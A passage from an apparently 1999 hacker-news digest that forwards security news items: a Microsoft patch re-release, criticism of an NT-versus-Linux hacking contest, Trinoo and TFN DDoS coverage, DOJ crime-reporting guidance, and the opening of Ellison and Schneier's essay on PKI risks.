http://www.microsoft.com/Security/Bulletins/ms99-046.asp; the FAQ also has been updated and is available at http://www.microsoft.com/Security/Bulletins/ms99-046faq.asp. All versions of the original patch were affected by the regression error, although the error only manifested itself in certain situations. When applying the new patch, it's not necessary to uninstall the original patch first. Just install the patch as normal. Here's how to determine which patch to apply: - If you are running Windows NT 4.0 SP4 or SP5 on an Intel machine, go to http://www.microsoft.com/Downloads/Release.asp?ReleaseID=16763 and select q243835sp5i.exe. - If you are running Windows NT 4.0 SP6 on an Intel machine, go to http://www.microsoft.com/Downloads/Release.asp?ReleaseID=16764 and select q243835i.exe. - If you are running Windows NT 4.0 SP4 or SP5 on an Alpha machine, go to http://www.microsoft.com/Downloads/Release.asp?ReleaseID=16763 and select q243835sp5a.exe. - If you are running Windows NT 4.0 SP6 on an Alpha machine, go to http://www.microsoft.com/Downloads/Release.asp?ReleaseID=16764 and select q243835a.exe. We are very sorry for any inconvenience caused by the regression error, and will do our best to prevent similar problems in the future. Regards, The Microsoft Security Response Team ******************************************************************* You have received this e-mail bulletin as a result of your registration to the Microsoft Product Security Notification Service. You may unsubscribe from this e-mail notification service at any time by sending an e-mail to MICROSOFT_SECURITY-SIGNOFF-REQUEST@ANNOUNCE.MICROSOFT.COM The subject line and message body are not used in processing the request, and can be anything you like. For more information on the Microsoft Security Notification Service please visit http://www.microsoft.com/security/services/bulletin.asp. For security-related information about Microsoft products, please visit the Microsoft Security Advisor web site at http://www.microsoft.com/security. _____________________________________________________________________ ** TO UNSUBSCRIBE, send the command "UNSUBSCRIBE win2ksecadvice" ** FOR A WEEKLY DIGEST, send the command "SET win2ksecadvice DIGEST" SEND ALL COMMANDS TO: listserv@listserv.ntsecurity.net @HWA 23.0 [ISN] Hacker Shootouts? ~~~~~~~~~~~~~~~~~~~~~~~ Forwarded From: darek.milewski@us.pwcglobal.com NETWORK WORLD FUSION FOCUS: JIM REAVIS on SECURITY Today's Focus: Hacker shootouts? Not! 12/10/99 By Jim Reavis I personally like the idea of companies sponsoring hacker challenges, where a box is set up on the 'Net for ingenious hackers to test their skills and win a prize. These challenges can be educational - for the hacker, the sponsor and sometimes for the product vendors as well. I would like to see more hacker challenges, bugs bounties and crypto algorithm cracking contests. However, it is completely irresponsible and unbelievable to see hacker shootouts that pit one operating system against another. Such was the case in September when PC Week Labs sponsored HackPCWeek.com, where a Windows NT server was pitted against a Linux server in a test to find which operating system was more secure. Unfortunately, these types of shootouts serve only to obfuscate the real issues of operating system security, confuse those trying to learn about the technical differences between the operating systems and further polarize the proponents of Linux and NT. Four days after the challenge was initiated, the Linux system was compromised by an add-on CGI script with improper security checks - not by the core operating system. In providing an explanation of the hack, PC Week Labs revealed that they did not install any of the 21 security patches for Red Hat 6; however they did install Service Pack 5 for NT. Their reasoning? It was too difficult to install the individual patches, but Service Pack 5 comes in one easy file. Their perverse reasoning could be described as defining deviancy down - systems administrators must be lazy and sloppy so we will be sloppy as well. PC Week Labs does not seem to be aware that service packs on NT are not necessarily a systems administrator's paradigm. The service packs are very famous for fixing some things, but breaking others; consequently, many systems administrators are more comfortable staying behind a service pack level and utilizing post-SP hotfixes to take a more targeted approach to solving problems. It is clear from PC Week Labs' explanation of their setup rationale that service packs are an ideal service management solution - that would be news even to many NT advocates. PC Week Labs is guilty of making unwise generalizations about how either of the operating systems are or should be securely implemented. So what did PC Week Labs prove? As many veterans of the computer security industry will say, you cannot prove security, only insecurity. Providing total systems assurance is a complicated process that cannot be emulated in a contest. When it comes to using any computer system for the purpose of securing sensitive data, the contribution the technology makes to that equation pales in comparison to the contribution the people must make. People make the difference in information security, and a solitary shootout will do more to establish the competency of the test developers, not the products themselves. Unfortunately, HackPCWeek.com proved very little. What are good hacker challenges to conduct? Vendors that challenge hackers to find flaws in their own products, or very specific algorithms, are doing a positive thing. Microsoft, for one, should be applauded for the Windows 2000 beta test site the firm ran on its own. This is a terrific way to get the product out of their developers' and beta testers' hands and into those with the talents to hack NT's vulnerabilities. We only wish that this effort was more extensive and that Microsoft would have offered nice rewards to successful participants. Vulnerabilities found on a beta product in a hacker challenge are vulnerabilities that won't show up in the released product. Code-breaking challenges like RSA's Data Encryption Standard challenge are enormously useful, as they give us concrete data on the amount of processing power required to crack a widely used crypto algorithm. To be sure, vendors use marketing spin to claim that their own hacker challenge has proven the superiority of their own products, but we all know that vendors are supposed to be biased, and we can filter out the noise. However, contests from a presumably unbiased authority need to be much more carefully constructed, and need to have objective goals. Computer magazines have done competitive product reviews for a long time, and the accepted protocol is to bend over backwards to be fair. Subjectively patching one operating system, but not the other, is troubling and damaging to PC Week Labs' credibility. There are many IT decision makers who want to get to the facts about which operating system they should be using now, and in the future. Facts are sometimes hard to come by, and unfortunately, a hacker shootout does not provide any facts. A hacker shootout serves only to further polarize the respective NT and Linux camps. Ultimately, HackPCWeek.com appears to be a base attempt to capitalize on the Linux-NT debate, without providing something useful for IT decision makers. I personally want to see more hacker challenges. Nothing would please me more than to see talented hackers making a living off of these contests, while we all learn from the results. What did we really learn from the HackPCWeek.com exercise? If you are looking to hire a Linux administrator and you receive a resume listing PC Week Labs as prior experience - you might want to pass. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ FOR RELATED LINKS -- Click here for Network World's home page: http://www.nwfusion.com ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Getting the drop on network intruders, Network World, 10/04/99 http://www.nwfusion.com/reviews/1004trends.html Hacker alert, Network World, 09/27/99 http://www.nwfusion.com/buzz99/buzzintel.html Defending against cyberattack, Network World, 08/23/99 http://www.nwfusion.com/news/1999/0823cyberattack.html Start-up's 'decoy' server helps track down hackers, Network World, 08/09/99 http://www.nwfusion.com/archive/1999/72100_08-09-1999.html Archive of Network World Fusion Focus on Security newsletters: http://www.nwfusion.com/newsletters/sec/ Other security-related articles from Network World: Viruses to crash New Year's bash: Remedies include shutting down e-mail systems, Network World, 12/6/99 http://www.nwfusion.com/news/1999/1206y2k.html Network World interview: Cisco's John Chambers, Network World, 12/6/99 http://www.nwfusion.com/news/1999/1206chambers.html About the author ---------------- Jim Reavis, the founder of SecurityPortal.com (http://securityportal.com/), is an analyst with over 10 years' experience consulting with Fortune 500 organizations on networking and security-related technology projects. Questions or comments? ---------------------- * For editorial comments, write Charley Spektor, Managing Editor at: cspektor@nww.com * For advertising information, write Jamie Kalbach, Account Executive at: jkalbach@nww.com * For all other inquiries, write Christine Rhoder, Circulation Marketing Manager at: crhoder@nww.com Subscription Services --------------------- You can subscribe or unsubscribe to any of your e-mail newsletters by updating your form at: http://www.nwfusion.com/focus/subscription.html For subscription changes that cannot be handled via the web, please send an email to our customer service dept: listnews@gaeta.itwpub1.com Network World Fusion is part of IDG.net, the IDG Online Network. IT All Starts Here: http://www.idg.net Copyright Network World, Inc., 1999 ---------------------------------------------------------------- The information transmitted is intended only for the person or entity to which it is addressed and may contain confidential and/or privileged material. Any review, retransmission, dissemination or other use of, or taking of any action in reliance upon, this information by persons or entities other than the intended recipient is prohibited. If you received this in error, please contact the sender and delete the material from any computer. ISN is sponsored by Security-Focus.COM @HWA 24.0 [ISN] 21 yr old secures $53Mil for high-tech startup ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.mercurycenter.com/svtech/news/breaking/merc/docs/004316.htm PALO ALTO, Calif. (AP) [12.15.99] -- Angus Davis told his parents not to worry when he was thrown out of the prestigious school Phillips Academy Andover for hacking into the telephone system. But even Davis couldn't have predicted that in less than five years he would leverage his scofflaw talents to secure $53 million in funding for a company trying to combine the power of the World Wide Web with the convenience of the telephone. On Wednesday Davis -- who is barely old enough to pop a bottle of champagne -- announced that he and his partners a their company, Tellme Networks Inc., have received $47 million in funding from rival venture capital firms Benchmark Capital and Kleiner Perkins Caufield & Byers. The new round of investment brings the company's total funding to $53 million. ``It's a lot of money,'' said Davis, 21, perched on the bed he has built above his desk. ``It's a testament to the importance of our team.'' [...] == Some day, on the corporate balance sheet, there will be an entry which reads, "Information"; for in most cases the information is more valuable than the hardware which processes it. -- Adm. Grace Murray Hopper, USN Ret. == http://www.dis.org/erehwon/ ISN is sponsored by Security-Focus.COM @HWA 25.0 [ISN] Netscape Security Flaw Revealed ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Forwarded From: "John Q. Public" http://www.zdnet.com/zdnn/stories/news/0,4586,2409537,00.html By Sharon Cleary, WSJ Interactive Edition December 15, 1999 5:50 AM PT A software-security firm warned that its researchers have found a potentially serious security flaw in the e-mail system used by Netscape's Web browser. Reliable Software Technologies, a Sterling, Va., software-security company, said Tuesday that two RST engineers needed just eight hours to duplicate the mathematical algorithm Netscape Mail uses to scramble users' passwords. The company said the problem affects all current versions of Netscape. Gary McGraw, vice president for corporate technology at RST, said the Netscape algorithm was "not an obvious sitting duck -- [the password] appears to be scrambled up in a good way, but it's not cryptographically strong." That would allow a determined hacker to reverse-engineer the algorithm and figure out the password. [...] Officials of Netscape, now a division of Dulles, Va.-based America Online Inc. (NYSE: AOL, were concerned by the news but said the unit has no plans to change its algorithm. [sic, bad parens] Chris Saito, the senior director for product management at Netscape, said that the option to save a password locally was included for convenience. Saito added that Netscape didn't use a stronger encryption algorithm to protect passwords so that "computer experts could still access the information, in case someone forgot their password." [snip] ISN is sponsored by Security-Focus.COM @HWA 26.0 [ISN] Cyberterrorism hype ~~~~~~~~~~~~~~~~~~~~~~~~~ Forwarded From: Johan.Ingles@janes.co.uk http://jir.janes.com/sample/jir0525.html Document created: 21 OCTOBER 1999 Cyberterrorism hype With the 1990s propensity to dot.com everything that moves, 'hacking' and 'cyberterrorism' have become subjects of intense media coverage. Almost daily, hitherto unknown security specialists warn of potential catastrophes: news that gets picked up by the media and crosses the globe with impunity. Johan J Ingles-le Nobel discussed the subject with programmers at Slashdot to profile so-called cyberterrorists and examine the viability of cyberwarfare. Cyberterrorism is a buzzword of 1999. Indeed, with the remarkable growth of the Internet, hacking horror stories have reached new heights of publicity, leading to a veritable media frenzy. Yet careful examination of the issue reveals much of the threat to be unsubstantiated rumour and media exaggeration. The exaggeration is understandable, however - these technologies underpin our entire society, and what paper can resist printing a scoop revealing that banks are being blackmailed with threats of attacks on their computers, or that a military satellite has been hijacked by hackers? The idea that an anonymous teenager working alone from his bedroom can wreak electronic havoc on the far side of the world makes for good press. What is a hacker? Nothing gets a hacker's back up quicker than someone confusing a hacker with cracker. The term 'hacker' refers to an individual who programmes enthusiastically (even obsessively), enjoys programming or is especially good at programming; a 'cracker' is somebody who breaks into another's computer systems or digs into their code (to make a copy-protected programme run). Yet the boundaries have become somewhat blurred and the popular understanding of these terms is is quite wrong: ever since Hollywood produced 'Wargames', based on Kevin Mitnic's cracking activities (known as 'exploits'), the term 'hacking' has become synonymous with unauthorised access into restricted systems - which is 'cracking'. In today's world, such activity also includes the deliberate defacement of websites. Hackers are quick to point out that there is a code of hacker ethics that precludes any profit from the activity - the only motive is the activity itself - but they are not naïve: realising the potential for misuse, they divide themselves into 'white-hat' hackers (ethical hackers) and 'black-hat' hackers (crackers). According to hackers, 99% of cracking incidents can be blamed on so-called 'script-kiddies'. These are usually young people who manage to acquire some 'cracking tools' somewhere on the Internet and are keen try them. They choose a 'cool' target (such as NASA, the Pentagon or the White House) and launch the tools. Older, more established hackers see them as upstarts. Think of a kid walking down a corridor testing doorknobs; whilst they are more than capable of defacing websites such as that of the Central Intelligence Agency (CIA), their actions are seen as the equivalent of putting down a whoopie cushion on the chair of the UN Secretary General - juvenile, noisy and somewhat embarrassing, but ultimately without real effect. Says Mick Morgan, webmaster to the UK's Queen Elizabeth: "I have nightmares about waking up to find graffiti (which is all it is) on one of my customer's sites." [snip..] ISN is sponsored by Security-Focus.COM @HWA 27.0 [ISN] The Beijing Hack Attack ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.worldnetdaily.com/bluesky_exnews/19991216_xex_hack_planet.shtml HONG KONG -- What do blondes, Jack in the Box tacos and 21st century cyber-warfare have in common? Everything, apparently, if you're one of the elite and stealthy soldiers in Hong Kong Blondes' computer hacking universe. These committed soldiers are locked in mortal combat with the government of the People's Republic of China and the transnational corporations who profit from dealing with it. "Human rights are a global concern and we have no second thoughts about attacking the multinational corporations who profit off of the human rights abuses committed against our Chinese brothers and sisters by their own government," says Databyte Cowgirl, one of the leaders of the Hong Kong Blondes. Along with numerous other members of the Hong Kong Blondes, Databyte Cowgirl was interviewed by WorldNetDaily over the course of seven weeks in July and August of 1999, as well as during the past several weeks. [...] == Some day, on the corporate balance sheet, there will be an entry which reads, "Information"; for in most cases the information is more valuable than the hardware which processes it. -- Adm. Grace Murray Hopper, USN Ret. == http://www.dis.org/erehwon/ ISN is sponsored by Security-Focus.COM @HWA 28.0 [ISN] Most cybercrime goes unpunished ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.ntsecurity.net/forums/2cents//news.asp?IDF=191 WINDOWS SECURITY NEWS 12/20/99 Most Cybercrime Goes Unpunished Monday, December 13, 1999 - According to a recent article by David Noack, most cybercrime goes unpunished. And based on the figures presented in this report, we have to agree. the report states that of 419 cases of alleged computer fraud referred to federal prosecutors in 1998, only 83 were prosecuted. The remainder were dismissed for lack of evidence. Also in 1998, 47 people were convicted of federal computer crimes, and 20 were sent to prison; another 10 were found not guilty. Anyone who has glanced at the ATTRITION.ORG archives realizes that these figures are pathetically low compared to the number of computer crimes that actually occur every day. The report basically leads us to assume most computer criminal are never reported to authorities--and perhaps that's because most computer criminals never get caught. Links: APB News http://www.apbnews.com/newscenter/internetcrime/1999/12/09/cyberlaws1209_01.html?s=snaph ISN is sponsored by Security-Focus.COM @HWA 29.0 [ISN] Jubilant Zhirinovsky wants to hack Western computers ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Forwarded From: "Vanna P. Rella" http://biz.yahoo.com/rf/991219/dy.html Sunday December 19, 5:19 pm Eastern Time Jubilant Zhirinovsky wants to hack Western computers MOSCOW, Dec 20 (Reuters) - Russia's maverick politician Vladimir Zhirinovsky, whose ultra-nationalist bloc looks set to do well in a parliamentary election, said on Monday he would celebrate by hacking into Western computers. Zhirinovsky's bloc was running at more than eight percent in early results compared with pre-election opinion polls which had given him some five percent. Asked by Reuters whether he would have a drink to mark his party's good showing, he said: ``No. No way, we Russians don't drink any more. We now work on computers, we use computers to send viruses to the West and then we poach your money.'' ``We have the best hackers in the world. We do not need to drink or smoke...We do not drink, smoke, have drugs and we don't have AIDS, that's what you have got in the West.'' Russia is a heavy drinking nation which is struggling to catch up with economically-advanced countries on the use of new technologies, such as the Internet, but a lack of resources and poor infrastructure confines progress to big cities. Zhirinovsky who has run and done reasonably well in all parliamentary and presidential elections since 1991 on a protest vote by lower stratas of the Russian society, is one of the most eccentric politicians with an acute political sense and bizarre sense of humour. He has thrown juice at an opponent in a live televised debate, promised to wash his boots in the Indian Ocean when Russia expands there and been involved in fist-fighting in the State Duma lower chamber of parliament. But at the same time, he has decided crucial votes in parliament in the Kremlin's favour and has developed a well organised party with solid assets. ISN is sponsored by Security-Focus.COM @HWA 30.0 [ISN] Tribe and Trinoo, two new virulent virii ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Forwarded From: "Noonan, Michael D" http://news.cnet.com/news/0-1003-200-1501144.html?tag=st.ne.1002.tgif?st.ne.fd.gif.f Computer security teams brace for attacks By Stephen Shankland Staff Writer, CNET News.com December 20, 1999, 1:30 p.m. PT Computer security teams are bracing for holiday attacks by two programs that enlist multiple systems to launch coordinated assaults on Web servers. Concern is mounting that the two malicious programs, called Tribe Flood Network and Trinoo, will show their colors in coming weeks. Experts fear that the holidays are a likely time, because computer administrators on vacation will be harder to locate and likely won't be paying as much attention to systems under their control. In addition, some suggest attackers are likely to strike in the midst of confusion that people expect with the arrival of the Year 2000 computer problem. Tribe and Trinoo also may be more powerful than previous programs of the same kind. The duo, which started appearing in recent months, "are a step above what has happened before," according to Dave Dittrich, a computer security technician at the University of Washington who wrote analyses of the programs. When installed onto hundreds or thousands of computers, the programs simultaneously bombard a select point on the Internet. If the information from the attackers comes fast enough, the target computer freezes up. Flooding attacks such as Tribe and Trinoo are examples of so-called denial-of-service attacks, a method that's been around as long as there have been networks to inundate. And launching attacks from several computers too has been tried before, for example with the "Smurf" attacks of last year. But Tribe and Trinoo give a new level of control to the attacker, and they are being improved, Dittrich said. Moreover, because the origin of the program is obscured, it's hard to counteract, said Quinn Peyton of the Computer Emergency Response Team (CERT) at Carnegie Mellon University. "There are machines now sitting there, prepared to attack somebody else," Peyton said. "Now one person can do a massive denial-of-service." CERT warns that the Trinoo and Tribe attack tools "appear to be undergoing active development, testing and deployment on the Internet." Tribe Flood Network and Trinoo launch their attacks from a host of innocent computers that already have been broken into. Then, on a signal from a master computer, the computers simultaneously bombard the victim machine with packets of information so fast that it becomes unresponsive. At that point, the target computer won't respond to commands and can't be taken off the network. To monitor computer attacks and vulnerabilities, the FBI in 1998 set up an office called the National Infrastructure Protection Center (NIPC). Although FBI officials did not comment on the Tribe or Trinoo attacks, the FBI is holding a news conference tomorrow about Y2K issues, a spokesman said. "There's a lot of paranoia for the Y2K stuff," said David Crawford of the Energy Department's Computer Incident Advisory Capability. CIAC is working hard to prepare a description of how to identify Trinoo and Tribe in the next few days. "We're looking for a unique signature that will identify these types of attack," he said. Dittrich might know. He had to respond when 27 computers at his university were among 227 that attacked the University of Minnesota during three days in August. "I was having a hard time finding all the people and getting all the systems cleaned up," he said, and that was just for the a small fraction of the systems involved. "During that time, their network was pretty much unusable for 100,000 users," Dittrich said. "There isn't much of a defense against these denial-of-service attacks." University of Washington computers also were used for attacks on computers in France, Norway and Australia, he said. The attack software was installed primarily on computers using Sun Microsystems' Solaris and Linux--both variations of the Unix operating system. To break into those computers, the intruder took advantage of known vulnerabilities that allowed him or her to take almost complete control of a computer then erase his or her tracks, Dittrich said. "The core message is that people who have systems on the Internet need to know how to deal with them," Dittrich said. "You can't expect your computer to be running for years, like a microwave. It's more like a really expensive car, where you've got to be taking it in for maintenance all the time." In the attack on the University of Minnesota, 114 of the 227 attacking systems were part of the Internet 2, a higher-speed successor to the current Internet. Using Internet 2 was important, because its higher-speed network can deliver more volleys in the denial-of-service attack. "Whoever has the bigger pipe wins," Dittrich said. ISN is sponsored by Security-Focus.COM @HWA 31.0 [ISN] As New Year nears, threat of Net attack program mounts ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Forwarded From: darek.milewski@us.pwcglobal.com As New Year nears, threat of Net attack program mounts By Stephen Shankland Staff Writer, CNET News.com December 23, 1999, 4:00 a.m. PT URL: http://news.cnet.com/category/0-1003-200-1504709.html A new and potentially more dangerous version of an Internet attack program has been posted just in time for the holidays, and another is on the way. A new version of a malicious program called the Tribe Flood Network (TFN) is more powerful and harder to detect than an earlier version, according to experts. And an updated sister program called Trinoo is due to be released next week. Few incidences of their use have been publicly acknowledged, but experts are warning sites to prepare against attacks that may coincide with New Year's. Widely anticipated problems owing to the Y2K computer glitch may provide cover for other mischief. The program works like this: A TFN attacker secretly embeds software into hundreds of computers. Then, at a selected time, a command is issued that prompts the infected computers to swamp a target Web site or server with messages in a method of attack called "denial of service." The program doesn't damage the "infected" computers or the target, but the sudden flood of messages typically knocks out the target system. Although it's possible for target computers to protect themselves by ignoring messages from attacking computers, it's hard to identify which computers are attacking--especially when there are hundreds. This fundamental vulnerability of networked computers makes protecting against denial-of-service attacks extremely difficult. The existence of TFN was reported earlier this week. The new variant, called TFN2K, is potentially more dangerous in that it can enlist machines based on both the Windows NT and Unix operating systems to deliver the flood of messages, according to Gia Threatte of the Packet Storm Web site, which publishes security-related software so system administrators can protect against attacks and intrusions. TFN2K also adds the ability to act on a single command, a stealthier mode of operation than the previous version (which required the controller to send a password), and encrypts communications, making the infecting messages harder to detect, Threatte said. Further, TFN2K sends decoy information to throw hunters looking for the source off the scent. The purported author of the TFN family, who goes by the name "Mixter," sent a version of TFN2K to Packet Storm. Packet Storm said it also expects a new version of Trinoo from Mixter. With the new software being released now and the "2K" allusion to the new year in the name of the program, it appears that a computer attack could occur during the holidays. "I don't really think you're going to see any serious attacks using this until New Year's," Threatte said. On Jan. 1, though, people likely will try to "cause a little mischief," she said. Other security watchers concur. The consensus of a Year 2000 bug workshop at Carnegie Mellon University's Computer Emergency Response Team was that "it is possible that intrusion attempts, viruses and other attacks will be focused on the time around 01 January 2000 under cover of Y2K incidents," CERT said. CERT has warned, "We are receiving reports of intruders compromising machines and installing distributed systems used for launching packet-flooding denial-of-service attacks." CERT said that attackers generally gained unauthorized access to these computers through well-known weaknesses, reinforcing the message that system administrators must stay up-to-date on keeping their systems secure. Detection of attacks and their ultimate source isn't easy. Trinoo and the TFN family obscure the address of the actual attacker by hiding the person in control behind two layers of computers. The attacker lays the groundwork by breaking in to several computers, installing master software on some and attack software on others. When it's time for the attack, a message is sent to the master computers, which in turn is relayed to the drone computers that do the attacking by flooding the target with "packets" of information. Compromised computers that can be infected with the attack software have become a kind of currency, with attackers trading names and information about them over Internet Relay Chat (IRC) discussions, Threatte said. Threatte defended Packet Storm's philosophy of publishing attack software for all to see. "If we don't make it available, there's no way you can protect against these things," Threatte said. Sprint, for example, recently called upon Packet Storm's information to more quickly fend off an intruder. Other, more dangerous versions of distributed attack software are circulating, but Packet Storm doesn't have them, so they're harder to detect, Threatte said. Packet Storm, a five-person group based in Palo Alto, Calif., is no stranger to controversy. It's now owned by security consultants Kroll-O'Gara after being embroiled in a debate with its former home at Harvard University and hacker chronicle site AntiOnline. Threatte foresees a time when coordinated denial-of-service is more serious. "Distributed attack tools right now are kind of in their infancy," she said. New improvements could involve a self-replicating "worm" version that would automatically spread the attack software to new computers. After several generations of spreading, the worm could erase itself from the original computers used to launch the worm, severing ties with the true origin. The worms could monitor several sites on the Internet for a sign that triggers the time and target to attack. ISN is sponsored by Security-Focus.COM @HWA 32.0 [ISN] Hackers hack sites to promote hacking hiatus for y2k (!?) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Forwarded From: "James J. Capone" http://www.zdnet.com/zdtv/cybercrime/news/story/0,3700,2413687,00.html Groups ask others to take hiatus in response to government plea. December 23, 1999 In a seemingly contradictory move, two hacking groups have defaced websites to urge others to refrain from hacking over the New Year's weekend. "... it is our hope that others will also abstain from defacing, until the Y2K hysteria has settled down." -- message posted on defaced website On Tuesday, a group using the handle Verb0 inserted this message into several sites: "Stop hacking for one day, from 31th December 1999 to 1st January 2000." Online games site Echelon Entertainment was among those hit, ZDNN reports ISN is sponsored by Security-Focus.COM @HWA 33.0 [ISN] How to report internet related crime ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Forwarded From: Elias Levy http://www.usdoj.gov/criminal/cybercrime/reporting.htm Computer Crime and Intellectual Property Section (CCIPS) How to Report Internet-Related Crime Internet-related crime, like any other crime, should be reported to appropriate law enforcement investigative authorities at the local, state, federal, or international levels, depending on the scope of the crime. Citizens who are aware of federal crimes should report them to local offices of federal law enforcement. Some federal law enforcement agencies that investigate domestic crime on the Internet include: the [1]Federal Bureau of Investigation (FBI), the [2]United States Secret Service, the [3]United States Customs Service, and the [4]Bureau of Alcohol, Tobacco and Firearms (ATF). Each of these agencies has offices conveniently located in every state to which crimes may be reported. Contact information regarding these local office may be found in local telephone directories. In general, federal crime may be reported to the local office of an appropriate law enforcement agency by a telephone call and by requesting the "Duty Complaint Agent." Each law enforcement agency also has a headquarters (HQ) in Washington, D.C., which has agents who specialize in particular areas. For example, the FBI and the U.S. Secret Service both have headquarters-based specialists in computer intrusion (i.e., computer hacker) cases. In fact, the FBI HQ hosts an interagency center, the [5]National Infrastructure Protection Center (NIPC), created just to support investigations of computer intrusions. The NIPCs general number for criminal investigations is 202-324-0303. The U.S. Secret Services Electronic Crimes Branch may be reached at 202-435-5850. The FBI and the Customs Service also have specialists in intellectual property crimes (i.e., copyright, software, movie, or recording piracy, trademark counterfeiting). Customs has a nationwide toll-free hotline for reporting at 800-BE-ALERT, or 800-232-2538. The FBI investigates violations of federal criminal law generally. Certain law enforcement agencies focus on particular kinds of crime. Other federal agencies with investigative authority are the [6]Federal Trade Commission and the [7]U.S. Securities and Exchange Commission. To determine some of the federal investigative law enforcement agencies that may be appropriate for reporting certain kinds of crime, please refer to the following table: Type of Crime Appropriate federal investigative law enforcement agencies Computer intrusion (i.e. hacking) FBI local office; NIPC (202-324-0303); U.S. Secret Service local office Password trafficking FBI local office; NIPC (202-324-0303); U.S. Secret Service local office Copyright (software, movie, sound recording) piracy FBI local office; if imported, U.S. Customs Service local office (800-BE-ALERT, or 800-232-2538) Theft of trade secrets FBI local office Trademark counterfeiting FBI local office; if imported, U.S. Customs Service local office (800-BE-ALERT, or 800-232-2538) Counterfeiting of currency U.S. Secret Service local office; FBI local office Child Pornography or Exploitation FBI local office; if imported, U.S. Customs Service local office (800-BE-ALERT, or 800-232-2538) Internet fraud FBI local office; Federal Trade Commission; if securities fraud, Securities and Exchange Commission Internet harassment FBI local office Internet bomb threats FBI local office; ATF local office Trafficking in explosive or incindiary devices or firearms over the Internet FBI local office; ATF local office Go to . . . [8]CCIPS home page || [9]Justice Department home page _________________________________________________________________ Updated page May 21, 1999 ISN is sponsored by Security-Focus.COM @HWA 34.0 [ISN] Ten risks of PKI (Public Key Infrastructure) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Forwarded From: "R. A. Hettinga" Originally To: cryptography@c2.net, Ten Risks of PKI: What You're not Being Told about Public Key Infrastructure By Carl Ellison and Bruce Schneier Computer security has been victim of the "year of the..." syndrome. First it was firewalls, then intrusion detection systems, then VPNs, and now certification authorities (CAs) and public-key infrastructure (PKI). "If you only buy X," the sales pitch goes, "then you will be secure." But reality is never that simple, and that is especially true with PKI. Certificates provide an attractive business model. They cost almost nothing to make, and if you can convince someone to buy a certificate each year for $5, that times the population of the Internet is a big yearly income. If you can convince someone to purchase a private CA and pay you afee for every certificate he issues, you're also in good shape. It's no wonder so many companies are trying to cash in on this potential market.With that much money at stake, it is also no wonder that almost all the literature and lobbying on the subject is produced by PKI vendors. And this literature leaves some pretty basic questions unanswered: What good are certificates anyway? Are they secure? For what? In this essay, we hope to explore some of those questions. Security is a chain; it's only as strong as the weakest link. The security of any CA-based system is based on many links and they're not all cryptographic. People are involved. Does the system aid those people, confuse them or just ignore them? Does it rely inappropriately on the honesty or thoroughness of people? Computer systems are involved. Are those systems secure? These all work together in an overall process. Is the process designed to maximize security or just profit? Each of these questions can indicate security risks that need to be addressed. Before we start: "Do we even need a PKI for e-commerce?" Open any article on PKI in the popular or technical press and you're likely to find the statement that a PKI is desperately needed for e-commerce to flourish. This statement is patently false. E-commerce is already flourishing, and there is no such PKI. Web sites are happy to take your order, whether or not you have a certificate. Still, as with many other false statements, there is a related true statement: commercial PKI desperately needs e-commerce in order to flourish. In other words, PKI startups need the claim of being essential to e- commerce in order to get investors. There are risks in believing this popular falsehood. The immediate risk is on the part of investors. The security risks are borne by anyone who decides to actually use the product of a commercial PKI. Risk #1: "Who do we trust, and for what?" There's a risk from an imprecise use of the word "trust." A CA is often defined as "trusted." In the cryptographic literature, this only means that it handles its own private keys well. This doesn't mean you can necessarily trust a certificate from that CA for a particular purpose: making a micropayment or signing a million-dollar purchase order. Who gave the CA the authority to grant such authorizations? Who made it trusted? A CA can do a superb job of writing a detailed Certificate Practice Statement, or CPS ó all the ones we've read disclaim all liability and any meaning to the certificate ó and then do a great job following that CPS, but that doesn't mean you can trust a certificate for your application. Many CAs sidestep the question of having no authority to delegate authorizations by issuing ID certificates. Anyone can assign names. We each do that all the time. This leaves the risk in the hands of the verifier of the certificate, if he uses an ID certificate as if it implied some kind of authorization. There are those who even try to induce a PKI customer to do just that. Their logic goes: (1) you have an ID certificate, (2) that gives you the keyholder's name, (3) that means you know who the keyholder is, (4) that's what you needed to know. Of course, that's not what you needed to know. In addition, the logical links from 1 to 2, 2 to 3 and 3 to 4 are individually flawed. [We leave finding those as an exercise for the reader.] Risk #2: "Who is using my key?" One of the biggest risks in any CA-based system is with your own private signing key. How do you protect it? You almost certainly don't own a secure computing system with physical access controls, TEMPEST shielding, "air wall" network security, and other protections; you store your private key on a conventional computer. There, it's subject to attack by viruses and other malicious programs. Even if your private key is safe on your computer, is your computer in a locked room, with video surveillance, so that you know no one but you ever uses it? If it's protected by a password, how hard is it to guess that password? If your key is stored on a smart card, how attack-resistant is the card? [Most are very weak.] If it is stored in a truly attack-resistant device, can an infected driving computer get the trustworthy device to sign something you didn't intend to sign? This matters mostly because of the term "non-repudiation." Like "trusted," this term is taken from the literature of academic cryptography. There it means something very specific: that the digital-signature algorithm is not breakable, so a third party cannot forge your signature. PKI vendors have latched onto the term and used it in a legal sense, lobbying for laws to the effect that if someone uses your private signing key, then you are not allowed to repudiate the signature. In other words, under some digital signature laws (e.g., Utah and Washington), if your signing key has been certified by an approved CA, then you are responsible for whatever that private key does. It does not matter who was at the computer keyboard or what virus did the signing; you are legally responsible. Contrast this with the practice regarding credit cards. Under mail- order/telephone-order (MOTO) rules, if you object to a line item on your credit card bill, you have the right to repudiate it ó to say you didn't buy that ó and the merchant is required to prove that you did. Risk #3: "How secure is the verifying computer?" The previous section showed that the computer holding or driving the private key needs to be secure. Long keys don't make up for an insecure system because total security is weaker than the weakest component in the system. The same applies to 